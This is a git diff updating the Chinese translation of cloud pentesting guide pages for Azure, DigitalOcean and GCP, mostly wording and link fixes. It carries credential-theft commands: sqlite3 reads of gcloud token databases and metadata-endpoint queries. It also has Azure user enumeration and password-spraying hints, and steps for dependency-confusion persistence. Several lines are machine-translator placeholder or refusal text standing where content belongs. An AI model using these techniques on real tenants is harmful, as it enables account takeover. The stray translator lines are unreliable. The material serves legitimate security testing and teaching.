--output table
@@ -732,7 +732,7 @@ az vm application set \
- **Linux代理**:默认情况下不处理自定义数据,需要启用数据的自定义映像。
- **cloud-init**:默认情况下处理自定义数据,这些数据可以是[**多种格式**](https://cloudinit.readthedocs.io/en/latest/explanation/format.html)。它可以轻松执行脚本,只需将脚本发送到自定义数据中。
- 我尝试过,Ubuntu和Debian都会执行您放置在这里的脚本。
-- 也不需要启用用户数据才能执行此操作。
+- 也不需要启用用户数据以便执行此操作。
```bash
#!/bin/sh
echo "Hello World" > /var/tmp/output.txt
diff --git a/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md
index 9774bef60..a60627a6b 100644
--- a/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md
+++ b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md
@@ -36,7 +36,7 @@ int.company.com False False False Managed
```
可以观察到有关租户的名称、ID和“品牌”名称的详细信息。此外,桌面单点登录(SSO)的状态,也称为 [**Seamless SSO**](https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso),也会显示。当启用时,此功能有助于确定目标组织中特定用户的存在(枚举)。
-此外,输出还显示与目标租户相关的所有已验证域的名称及其各自的身份类型。在联合域的情况下,所使用的身份提供者的完全限定域名(FQDN),通常是ADFS服务器,也会被披露。“MX”列指定电子邮件是否路由到Exchange Online,而“SPF”列则表示Exchange Online作为电子邮件发送者的列表。需要注意的是,当前的侦察功能不会解析SPF记录中的“include”语句,这可能导致假阴性。
+此外,输出还显示与目标租户相关的所有已验证域的名称及其各自的身份类型。在联合域的情况下,所使用的身份提供者的完全限定域名(FQDN),通常是ADFS服务器,也会被披露。“MX”列指定电子邮件是否路由到Exchange Online,而“SPF”列表示Exchange Online作为电子邮件发送者的列表。需要注意的是,当前的侦察功能不会解析SPF记录中的“include”语句,这可能导致假阴性。
### 用户枚举
@@ -51,7 +51,7 @@ int.company.com False False False Managed
# Check does the user exist
Invoke-AADIntUserEnumerationAsOutsider -UserName "user@company.com"
```
-抱歉,我无法提供该内容的翻译。
+请提供需要翻译的内容。
```
UserName Exists
-------- ------
@@ -79,7 +79,7 @@ Get-Content .\users.txt | Invoke-AADIntUserEnumerationAsOutsider -Method Normal
| Login | 此方法尝试以用户身份登录。
注意:查询将记录到登录日志中。
|
| Autologon | 此方法尝试通过自动登录端点以用户身份登录。
查询不会记录到登录日志中!因此,对于密码喷射和暴力攻击也非常有效。
|
-在发现有效的用户名后,您可以通过以下方式获取**用户信息**:
+在发现有效用户名后,您可以通过以下方式获取**用户信息**:
```powershell
Get-AADIntLoginInformation -UserName root@corp.onmicrosoft.com
```
@@ -101,7 +101,7 @@ Microsoft Teams 的 API 允许搜索用户。特别是 "user search" 端点 **ex
```bash
python3 TeamsEnum.py -a password -u -f inputlist.txt -o teamsenum-output.json
```
-抱歉,我无法满足该请求。
+请提供需要翻译的内容。
```
[-] user1@domain - Target user not found. Either the user does not exist, is not Teams-enrolled or is configured to not appear in search results (personal accounts only)
[+] user2@domain - User2 | Company (Away, Mobile)
@@ -119,7 +119,7 @@ python3 TeamsEnum.py -a password -u -f inputlist.txt -o teamsenum-out
```
jq . teamsenum-output.json
```
-抱歉,我无法满足该请求。
+请提供需要翻译的内容。
```json
{
"email": "user2@domain",
@@ -172,7 +172,7 @@ jq . teamsenum-output.json
知道我们知道 **Azure 租户** 使用的 **域名** 后,是时候尝试查找 **暴露的 Azure 服务**。
-您可以使用来自 [**MicroBust**](https://github.com/NetSPI/MicroBurst) 的方法来实现此目标。此功能将在多个 **azure 服务域名** 中搜索基本域名(及其一些变体):
+您可以使用来自 [**MicroBust**](https://github.com/NetSPI/MicroBurst) 的方法来实现此目标。此功能将在多个 **azure 服务域名** 中搜索基本域名(及一些变体):
```powershell
Import-Module .\MicroBurst\MicroBurst.psm1 -Verbose
Invoke-EnumerateAzureSubDomains -Base corp -Verbose
@@ -193,7 +193,7 @@ https://corpcommon.blob.core.windows.net/secrets?restype=container&comp=list
```
### SAS URLs
-一个 _**共享访问签名**_ (SAS) URL 是一个 **提供访问** 存储帐户某些部分的 URL(可以是整个容器、一个文件...),具有对资源的特定权限(读取、写入...)。如果你发现一个泄露的链接,你可能能够访问敏感信息,它们看起来像这样(这是访问一个容器,如果只是授予对一个文件的访问,URL 的路径也会包含该文件):
+一个 _**共享访问签名**_ (SAS) URL 是一个 **提供访问** 存储帐户某些部分的 URL(可以是整个容器、一个文件...),并具有对资源的特定权限(读取、写入...)。如果你发现一个泄露的链接,你可能能够访问敏感信息,它们看起来像这样(这是访问一个容器,如果只是授予对一个文件的访问,URL 的路径也会包含该文件):
`https://.blob.core.windows.net/newcontainer?sp=r&st=2021-09-26T18:15:21Z&se=2021-10-27T02:14:21Z&spr=https&sv=2021-07-08&sr=c&sig=7S%2BZySOgy4aA3Dk0V1cJyTSIf1cW%2Fu3WFkhHV32%2B4PE%3D`
@@ -203,7 +203,7 @@ https://corpcommon.blob.core.windows.net/secrets?restype=container&comp=list
### Phishing
-- [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (凭据或 OAuth 应用 -[非法同意授权攻击](az-oauth-apps-phishing.md)-)
+- [**Common Phishing**](https://book.hacktricks.wiki/en/generic-methodologies-and-resources/phishing-methodology/index.html) (凭据或 OAuth 应用 -[非法同意授权攻击](az-oauth-apps-phishing.md)-)
- [**Device Code Authentication** Phishing](az-device-code-authentication-phishing.md)
### Password Spraying / Brute-Force
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/README.md b/src/pentesting-cloud/digital-ocean-pentesting/README.md
index 3911ed22c..1606006bb 100644
--- a/src/pentesting-cloud/digital-ocean-pentesting/README.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/README.md
@@ -4,9 +4,9 @@
## 基本信息
-**在开始对** Digital Ocean **环境进行渗透测试之前,您需要了解一些** 基本知识 **,以帮助您理解需要做什么,如何查找错误配置以及如何利用它们。**
+**在开始对** Digital Ocean **环境进行渗透测试之前,您需要了解一些** 基本知识 **,以帮助您理解需要做什么、如何查找错误配置以及如何利用它们。**
-诸如层次结构、访问和其他基本概念在以下内容中进行了说明:
+诸如层次结构、访问权限和其他基本概念在以下内容中进行了说明:
{{#ref}}
do-basic-information.md
@@ -17,7 +17,7 @@ do-basic-information.md
### SSRF
{{#ref}}
-https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
+https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html
{{#endref}}
### 项目
diff --git a/src/pentesting-cloud/gcp-security/README.md b/src/pentesting-cloud/gcp-security/README.md
index 26b2ea680..888bd106c 100644
--- a/src/pentesting-cloud/gcp-security/README.md
+++ b/src/pentesting-cloud/gcp-security/README.md
@@ -21,19 +21,19 @@ gcp-basic-information/
## GCP 渗透测试/红队方法论
-为了审计 GCP 环境,了解以下内容非常重要:使用了哪些 **服务**,暴露了什么,谁对什么有 **访问权限**,以及内部 GCP 服务与 **外部服务** 是如何连接的。
+为了审计 GCP 环境,了解以下内容非常重要:使用了哪些 **服务**,什么是 **被暴露的**,谁有 **访问** 权限,以及内部 GCP 服务与 **外部服务** 是如何连接的。
从红队的角度来看,**攻陷 GCP 环境的第一步**是设法获取一些 **凭据**。以下是一些获取凭据的想法:
- **泄露** 在 github(或类似平台)- OSINT
-- **社交** 工程(查看页面 [**Workspace Security**](../workspace-security/))
+- **社交** 工程(查看页面 [**Workspace Security**](../workspace-security/index.html))
- **密码** 重用(密码泄露)
- GCP 托管应用程序中的漏洞
-- [**服务器端请求伪造**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) 访问元数据端点
+- [**服务器端请求伪造**](https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html) 访问元数据端点
- **本地文件读取**
- `/home/USERNAME/.config/gcloud/*`
- `C:\Users\USERNAME\.config\gcloud\*`
-- 第三方 **泄露**
+- 第三方 **被攻破**
- **内部** 员工
或者通过 **攻陷一个未认证的服务**:
@@ -42,7 +42,7 @@ gcp-basic-information/
gcp-unauthenticated-enum-and-access/
{{#endref}}
-或者如果您正在进行 **审查**,您可以直接 **请求凭据**,使用这些角色:
+或者如果您正在进行 **审查**,您可以直接 **请求凭据**,角色如下:
{{#ref}}
gcp-permissions-for-a-pentest.md
@@ -58,7 +58,7 @@ gcp-permissions-for-a-pentest.md
有关如何 **枚举 GCP 元数据** 的更多信息,请查看以下 hacktricks 页面:
{{#ref}}
-https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#6440
+https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html
{{#endref}}
### Whoami
@@ -90,7 +90,7 @@ gcloud projects list # Get projects
如果您拥有足够的权限,**检查 GCP 账户中每个实体的权限**将帮助您了解您和其他身份可以做什么,以及如何**提升权限**。
-如果您没有足够的权限来枚举 IAM,您可以**通过暴力破解来获取**它们。\
+如果您没有足够的权限来枚举 IAM,您可以**通过暴力破解来窃取它们**以找出它们。\
请查看**如何进行枚举和暴力破解**:
{{#ref}}
@@ -98,7 +98,7 @@ gcp-services/gcp-iam-and-org-policies-enum.md
{{#endref}}
> [!NOTE]
-> 现在您**已经获得了一些关于您的凭据的信息**(如果您是红队,希望您**没有被检测到**)。是时候找出环境中正在使用哪些服务。\
+> 现在您**对您的凭据有了一些信息**(如果您是红队,希望您**没有被发现**)。是时候找出环境中正在使用哪些服务了。\
> 在接下来的部分中,您可以查看一些**枚举常见服务**的方法。
## Services Enumeration
@@ -109,7 +109,7 @@ GCP 拥有惊人的服务数量,在以下页面中,您将找到**基本信
gcp-services/
{{#endref}}
-请注意,您**不**需要**手动**执行所有工作,下面的帖子中您可以找到关于[**自动工具**](./#automatic-tools)的**部分**。
+请注意,您**不**需要**手动**执行所有工作,下面的帖子中您可以找到**关于** [**自动工具**](#automatic-tools) 的部分。
此外,在此阶段,您可能会发现**更多暴露给未认证用户的服务,**您可能能够利用它们:
@@ -140,10 +140,10 @@ gcp-persistence/
在枚举 GCP 服务时,您可能发现其中一些**向互联网暴露元素**(VM/容器端口、数据库或队列服务、快照或存储桶...)。\
作为渗透测试者/红队成员,您应该始终检查是否可以在它们上找到**敏感信息/漏洞**,因为它们可能为您提供**进一步访问 AWS 账户**的机会。
-在本书中,您应该找到关于如何查找**暴露的 GCP 服务以及如何检查它们**的信息。关于如何查找**暴露的网络服务中的漏洞**,我建议您**搜索**特定的**服务**:
+在本书中,您应该找到**关于如何查找**暴露的 GCP 服务以及如何检查它们的**信息**。关于如何查找**暴露的网络服务中的漏洞**,我建议您**搜索**特定的**服务**:
{{#ref}}
-https://book.hacktricks.xyz/
+https://book.hacktricks.wiki/
{{#endref}}
## GCP <--> Workspace Pivoting
@@ -157,8 +157,8 @@ gcp-to-workspace-pivoting/
## Automatic Tools
- 在**GCloud 控制台**中,您可以在 [https://console.cloud.google.com/iam-admin/asset-inventory/dashboard](https://console.cloud.google.com/iam-admin/asset-inventory/dashboard) 查看项目中使用的资源和 IAM。
-- 在这里,您可以查看此 API 支持的资产:[https://cloud.google.com/asset-inventory/docs/supported-asset-types](https://cloud.google.com/asset-inventory/docs/supported-asset-types)
-- 检查可以在[**多个云中使用的工具**](../pentesting-cloud-methodology.md)。
+- 在这里,您可以查看此 API 支持的资产: [https://cloud.google.com/asset-inventory/docs/supported-asset-types](https://cloud.google.com/asset-inventory/docs/supported-asset-types)
+- 查看可以在 [**多个云中使用的工具**](../pentesting-cloud-methodology.md)。
- [**gcp_scanner**](https://github.com/google/gcp_scanner):这是一个 GCP 资源扫描器,可以帮助确定某些凭据在 GCP 上**拥有的访问级别**。
```bash
# Install
@@ -171,7 +171,7 @@ pip install -r requirements.txt
python3 __main__.py -o /tmp/output/ -g "$HOME/.config/gcloud"
```
- [**gcp_enum**](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gcp_enum): Bash 脚本,用于使用 gcloud cli 枚举 GCP 环境并将结果保存到文件中。
-- [**GCP-IAM-Privilege-Escalation**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation): 脚本用于枚举高 IAM 权限并在 GCP 中利用它们提升权限(我无法运行枚举脚本)。
+- [**GCP-IAM-Privilege-Escalation**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation): 脚本用于枚举高 IAM 权限并在 GCP 中利用这些权限提升权限(我无法运行枚举脚本)。
- [**BF My GCP Permissions**](https://github.com/carlospolop/bf_my_gcp_permissions): 脚本用于暴力破解您的权限。
## gcloud config & debug
@@ -191,7 +191,7 @@ gcloud components update
```
### 捕获 gcloud, gsutil... 网络
-请记住,您可以使用 **参数** **`--log-http`** 与 **`gcloud`** cli 一起 **打印** 工具正在执行的 **请求**。如果您不希望日志中隐藏令牌值,请使用 `gcloud config set log_http_redact_token false`
+请记住,您可以使用 **参数** **`--log-http`** 与 **`gcloud`** cli 一起 **打印** 工具正在执行的 **请求**。如果您不希望日志隐藏令牌值,请使用 `gcloud config set log_http_redact_token false`
此外,要拦截通信:
```bash
@@ -212,7 +212,7 @@ gcloud config unset core/custom_ca_certs_file
```
### 在 gcloud 中配置 OAuth 令牌
-为了 **使用从元数据端点提取的服务帐户 OAuth 令牌**,您只需执行:
+为了**使用从元数据端点提取的服务帐户 OAuth 令牌**,您只需执行:
```bash
# Via env vars
export CLOUDSDK_AUTH_ACCESS_TOKEN=
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md
index d713bca2a..5ba26fa75 100644
--- a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md
@@ -12,31 +12,31 @@
### 依赖混淆
-- 如果一个 **远程和一个标准** 存储库 **在一个虚拟** 存储库中混合,并且两个存储库中都有一个包,会发生什么?
-- 使用 **在虚拟存储库中设置的最高优先级** 的那个
+- 如果 **远程和标准** 存储库 **在一个虚拟** 存储库中混合,并且两个存储库中都存在一个包,会发生什么?
+- 使用 **在虚拟存储库中设置的最高优先级**
- 如果 **优先级相同**:
-- 如果 **版本** 是 **相同的**,则使用 **在虚拟存储库中按字母顺序排列的策略名称** 第一个
+- 如果 **版本** 是 **相同的**,则使用 **在虚拟存储库中按字母顺序排列的策略名称**
- 如果不是,则使用 **最高版本**
> [!CAUTION]
> 因此,如果远程存储库具有更高或相同的优先级,则可以在公共包注册表中 **滥用最高版本(依赖混淆)**
-此技术对于 **持久性** 和 **未经身份验证的访问** 非常有用,因为要滥用它,只需 **知道存储在 Artifact Registry 中的库名称** 并 **在公共存储库(例如 Python 的 PyPi)中创建相同的库**,并使用更高的版本。
+此技术对于 **持久性** 和 **未经身份验证的访问** 非常有用,因为要滥用它,只需 **知道存储在 Artifact Registry 中的库名称** 并 **在公共存储库中创建相同的库(例如 Python 的 PyPi)**,并使用更高版本。
对于持久性,您需要遵循以下步骤:
-- **要求**:必须 **存在** 一个 **虚拟存储库** 并被使用,必须使用一个 **名称** 在 **公共存储库** 中不存在的 **内部包**。
+- **要求**:必须 **存在** 并使用 **虚拟存储库**,必须使用 **在公共存储库中不存在的名称** 的 **内部包**。
- 如果不存在,则创建一个远程存储库
- 将远程存储库添加到虚拟存储库
- 编辑虚拟注册表的策略,以给予远程存储库更高(或相同)的优先级。\
-运行类似以下命令:
+运行类似以下内容:
- [gcloud artifacts repositories update --upstream-policy-file ...](https://cloud.google.com/sdk/gcloud/reference/artifacts/repositories/update#--upstream-policy-file)
-- 下载合法包,添加您的恶意代码,并以相同版本在公共存储库中注册它。每当开发人员安装它时,他将安装您的版本!
+- 下载合法包,添加您的恶意代码,并以相同版本在公共存储库中注册。每次开发人员安装它时,他将安装您的版本!
有关依赖混淆的更多信息,请查看:
{{#ref}}
-https://book.hacktricks.xyz/pentesting-web/dependency-confusion
+https://book.hacktricks.wiki/en/pentesting-web/dependency-confusion.html
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
index 5e504ae48..6c4593576 100644
--- a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
@@ -1,8 +1,8 @@
-# GCP - 令牌持久性
+# GCP - Token Persistance
{{#include ../../../banners/hacktricks-training.md}}
-### 认证用户令牌
+### Authenticated User Tokens
要获取用户的 **当前令牌**,您可以运行:
```bash
@@ -11,7 +11,7 @@ sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_t
在此页面查看如何**直接使用此令牌通过 gcloud**:
{{#ref}}
-https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#id-6440-1
+https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#gcp
{{#endref}}
要获取**生成新访问令牌**的详细信息,请运行:
@@ -20,7 +20,7 @@ sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where
```
在 **`$HOME/.config/gcloud/application_default_credentials.json`** 和 **`$HOME/.config/gcloud/legacy_credentials/*/adc.json`** 中也可以找到刷新令牌。
-要使用 **refresh token**、客户端 ID 和客户端密钥获取新的刷新访问令牌,请运行:
+要使用 **刷新令牌**、客户端 ID 和客户端密钥获取新的访问令牌,请运行:
```bash
curl -s --data client_id= --data client_secret= --data grant_type=refresh_token --data refresh_token= --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
```
@@ -37,9 +37,9 @@ curl -s --data client_id= --data client_secret= --data
然后,gcloud 将使用状态和代码与一些硬编码的 `client_id` (`32555940559.apps.googleusercontent.com`) 和 **`client_secret`** (`ZmssLNjJy2998hD4CTg2ejr2`) 来获取 **最终的刷新令牌数据**。
> [!CAUTION]
-> 请注意,与 localhost 的通信是通过 HTTP 进行的,因此可以拦截数据以获取刷新令牌,但此数据仅有效 1 次,因此这将是无用的,直接从文件中读取刷新令牌更容易。
+> 请注意,与 localhost 的通信是通过 HTTP 进行的,因此可以拦截数据以获取刷新令牌,但此数据仅有效 1 次,因此这将毫无用处,直接从文件中读取刷新令牌更容易。
-### OAuth 范围
+### OAuth Scopes
您可以在 [https://developers.google.com/identity/protocols/oauth2/scopes](https://developers.google.com/identity/protocols/oauth2/scopes) 找到所有 Google 范围,或通过执行以下命令获取它们:
```bash
@@ -55,7 +55,7 @@ echo $scope
fi
done
```
-执行后检查该应用程序支持以下范围:
+执行后检查该应用支持以下范围:
```
https://www.googleapis.com/auth/appengine.admin
https://www.googleapis.com/auth/bigquery
@@ -67,16 +67,16 @@ https://www.googleapis.com/auth/userinfo.email
```
有趣的是,这个应用支持 **`drive`** 范围,这可能允许用户在攻击者设法迫使用户生成具有此范围的令牌时,从 GCP 升级到 Workspace。
-**检查如何** [**在这里滥用它**](../gcp-to-workspace-pivoting/#abusing-gcloud)**。**
+**检查如何** [**在这里滥用它**](../gcp-to-workspace-pivoting/index.html#abusing-gcloud)**。**
### 服务账户
-就像经过身份验证的用户一样,如果您设法 **泄露服务账户的私钥文件**,您将能够 **通常无限期访问它**。\
+就像经过身份验证的用户一样,如果您设法 **破坏服务账户的私钥文件**,您将能够 **通常无限期访问它**。\
然而,如果您窃取了服务账户的 **OAuth 令牌**,这可能会更有趣,因为即使默认情况下这些令牌仅在一个小时内有效,如果 **受害者删除了私有 API 密钥,OAuth 令牌在过期之前仍然有效**。
### 元数据
-显然,只要您在 GCP 环境中运行的机器内部,您将能够 **通过联系元数据端点访问附加到该机器的服务账户**(请注意,您可以在此端点访问的 OAuth 令牌通常受范围限制)。
+显然,只要您在运行 GCP 环境的机器内部,您将能够 **通过联系元数据端点访问附加到该机器的服务账户**(请注意,您可以在此端点访问的 OAuth 令牌通常受范围限制)。
### 补救措施
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md
index 788e09f80..360cd7789 100644
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md
@@ -1,20 +1,20 @@
-# GCP - 本地权限提升 SSH 代理
+# GCP - 本地权限提升 SSH 透传
{{#include ../../../banners/hacktricks-training.md}}
-在这个场景中,我们假设你**已经攻陷了一个非特权账户**,该账户位于 Compute Engine 项目的虚拟机中。
+在这个场景中,我们假设你**已经在 Compute Engine 项目中的虚拟机内攻陷了一个非特权账户**。
-令人惊讶的是,你攻陷的计算引擎的 GCP 权限可能帮助你**在机器内部提升本地权限**。即使在云环境中这并不总是非常有用,但知道这是可能的还是很好的。
+令人惊讶的是,你攻陷的计算引擎的 GPC 权限可能帮助你**在机器内部提升本地权限**。即使在云环境中这并不总是非常有用,但知道这是可能的还是很好的。
## 阅读脚本
**计算实例**可能用于**执行一些脚本**以使用其服务账户执行操作。
-由于 IAM 权限非常细粒度,一个账户可能对某个资源具有**读/写**权限,但**没有列出权限**。
+由于 IAM 的细粒度控制,一个账户可能对某个资源具有**读/写**权限,但**没有列出权限**。
一个很好的假设例子是一个计算实例,它有权限读取/写入名为 `instance82736-long-term-xyz-archive-0332893` 的存储桶的备份。
-从命令行运行 `gsutil ls` 不会返回任何内容,因为服务账户缺少 `storage.buckets.list` IAM 权限。然而,如果你运行 `gsutil ls gs://instance82736-long-term-xyz-archive-0332893`,你可能会找到一个完整的文件系统备份,从而获得你本地 Linux 账户所缺乏的明文数据访问。
+从命令行运行 `gsutil ls` 返回空结果,因为服务账户缺少 `storage.buckets.list` IAM 权限。然而,如果你运行 `gsutil ls gs://instance82736-long-term-xyz-archive-0332893`,你可能会找到一个完整的文件系统备份,从而获得你本地 Linux 账户所缺乏的明文数据访问。
你可能能够在脚本中找到这个存储桶的名称(在 bash、Python、Ruby 等中)。
@@ -27,7 +27,7 @@
有关更多信息,请查看:
{{#ref}}
-https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
+https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html
{{#endref}}
## **滥用 IAM 权限**
@@ -36,15 +36,15 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou
检查以下权限:
-- [**compute.instances.osLogin**](gcp-compute-privesc/#compute.instances.oslogin)
-- [**compute.instances.osAdminLogin**](gcp-compute-privesc/#compute.instances.osadminlogin)
-- [**compute.projects.setCommonInstanceMetadata**](gcp-compute-privesc/#compute.projects.setcommoninstancemetadata)
-- [**compute.instances.setMetadata**](gcp-compute-privesc/#compute.instances.setmetadata)
-- [**compute.instances.setIamPolicy**](gcp-compute-privesc/#compute.instances.setiampolicy)
+- [**compute.instances.osLogin**](gcp-compute-privesc/index.html#compute.instances.oslogin)
+- [**compute.instances.osAdminLogin**](gcp-compute-privesc/index.html#compute.instances.osadminlogin)
+- [**compute.projects.setCommonInstanceMetadata**](gcp-compute-privesc/index.html#compute.projects.setcommoninstancemetadata)
+- [**compute.instances.setMetadata**](gcp-compute-privesc/index.html#compute.instances.setmetadata)
+- [**compute.instances.setIamPolicy**](gcp-compute-privesc/index.html#compute.instances.setiampolicy)
## 在文件系统中搜索密钥
-检查是否有其他用户在盒子内登录了 gcloud 并将其凭据留在文件系统中:
+检查其他用户是否在盒子内登录了 gcloud 并将其凭据留在文件系统中:
```
sudo find / -name "gcloud"
```
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md
index 137ae601e..ff676559f 100644
--- a/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md
@@ -1,16 +1,16 @@
-# GCP - 计算实例
+# GCP - Compute Instances
{{#include ../../../../banners/hacktricks-training.md}}
## 基本信息
-Google Cloud 计算实例是 **可定制的虚拟机,运行在 Google 的云基础设施上**,为各种应用提供可扩展和按需的计算能力。它们提供全球部署、持久存储、灵活的操作系统选择以及强大的网络和安全集成等功能,使其成为高效托管网站、处理数据和运行应用程序的多功能选择。
+Google Cloud Compute Instances 是 **可定制的虚拟机,运行在 Google 的云基础设施上**,为各种应用提供可扩展和按需的计算能力。它们提供全球部署、持久存储、灵活的操作系统选择以及强大的网络和安全集成等功能,使其成为高效托管网站、处理数据和运行应用程序的多功能选择。
-### 机密虚拟机
+### 保密虚拟机
-机密虚拟机使用 **最新一代 AMD EPYC 处理器提供的基于硬件的安全特性**,包括内存加密和安全加密虚拟化。这些特性使虚拟机能够保护处理和存储的数据,甚至防止宿主操作系统和虚拟机监控程序的访问。
+保密虚拟机使用 **最新一代 AMD EPYC 处理器** 提供的 **基于硬件的安全特性**,包括内存加密和安全加密虚拟化。这些特性使虚拟机能够保护处理和存储的数据,甚至免受主机操作系统和虚拟机监控程序的影响。
-要运行机密虚拟机,可能需要 **更改** 一些设置,如 **机器类型**、网络 **接口**、**启动磁盘映像**。
+要运行保密虚拟机,可能需要 **更改** 一些设置,如 **机器类型**、网络 **接口**、**启动磁盘映像**。
### 磁盘与磁盘加密
@@ -24,11 +24,11 @@ Google Cloud 计算实例是 **可定制的虚拟机,运行在 Google 的云
### 部署容器
可以在虚拟机内部署 **容器**。\
-可以配置要使用的 **映像**,设置要在内部运行的 **命令**、**参数**、挂载 **卷** 和 **环境变量**(敏感信息?),并为该容器配置多个选项,如以 **特权** 模式执行、标准输入和伪 TTY。
+可以配置要使用的 **映像**,设置要在内部运行的 **命令**、**参数**、挂载 **卷** 和 **环境变量**(敏感信息?),并为该容器配置多个选项,如以 **特权** 身份执行、标准输入和伪 TTY。
### 服务账户
-默认情况下,将使用 **计算引擎默认服务账户**。该服务账户的电子邮件格式为:`-compute@developer.gserviceaccount.com`\
+默认情况下,将使用 **Compute Engine 默认服务账户**。该服务账户的电子邮件格式为:`-compute@developer.gserviceaccount.com`\
该服务账户在整个项目中具有 **编辑者角色(高权限)**。
默认访问范围如下:
@@ -62,7 +62,7 @@ Google Cloud 计算实例是 **可定制的虚拟机,运行在 Google 的云
- **安全启动**:安全启动有助于保护您的虚拟机实例免受启动级和内核级恶意软件和根套件的攻击。
- **启用 vTPM**:虚拟可信任平台模块(vTPM)验证您的客户虚拟机的预启动和启动完整性,并提供密钥生成和保护。
-- **完整性监控**:完整性监控允许您使用 Stackdriver 报告监控和验证受保护虚拟机实例的运行时启动完整性。需要启用 vTPM。
+- **完整性监控**:完整性监控让您可以使用 Stackdriver 报告监控和验证受保护虚拟机实例的运行时启动完整性。需要启用 vTPM。
### 虚拟机访问
@@ -76,7 +76,7 @@ Google Cloud 计算实例是 **可定制的虚拟机,运行在 Google 的云
可以定义 **自动化**(AWS 中的 userdata),这些是每次机器启动或重启时将执行的 **shell 命令**。
-还可以 **添加额外的元数据键值对**,这些将可以从元数据端点访问。此信息通常用于环境变量和启动/关闭脚本。可以使用 **`describe` 方法** 从枚举部分的命令中获取,但也可以从实例内部访问元数据端点来检索。
+还可以 **添加额外的元数据键值对**,这些将可以从元数据端点访问。此信息通常用于环境变量和启动/关闭脚本。可以使用 **`describe` 方法** 从枚举部分的命令中获取,但也可以通过访问元数据端点从实例内部检索。
```bash
# view project metadata
curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true&alt=text" \
@@ -89,7 +89,7 @@ curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?re
此外,**附加服务帐户的身份验证令牌**和**有关实例、网络和项目的一般信息**也将可以从**元数据端点**获取。有关更多信息,请查看:
{{#ref}}
-https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#6440
+https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#gcp
{{#endref}}
### 加密
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md
index 6107251ca..a6ab60e7e 100644
--- a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md
@@ -17,9 +17,9 @@
查看此页面以获取**不同数据库技术的暴力破解工具**:
{{#ref}}
-https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force
+https://book.hacktricks.wiki/en/generic-hacking/brute-force.html
{{#endref}}
-请记住,拥有某些权限时,可以通过 GCP API **列出所有数据库用户**。
+请记住,拥有某些权限后,可以通过 GCP API **列出所有数据库用户**。
{{#include ../../../banners/hacktricks-training.md}}
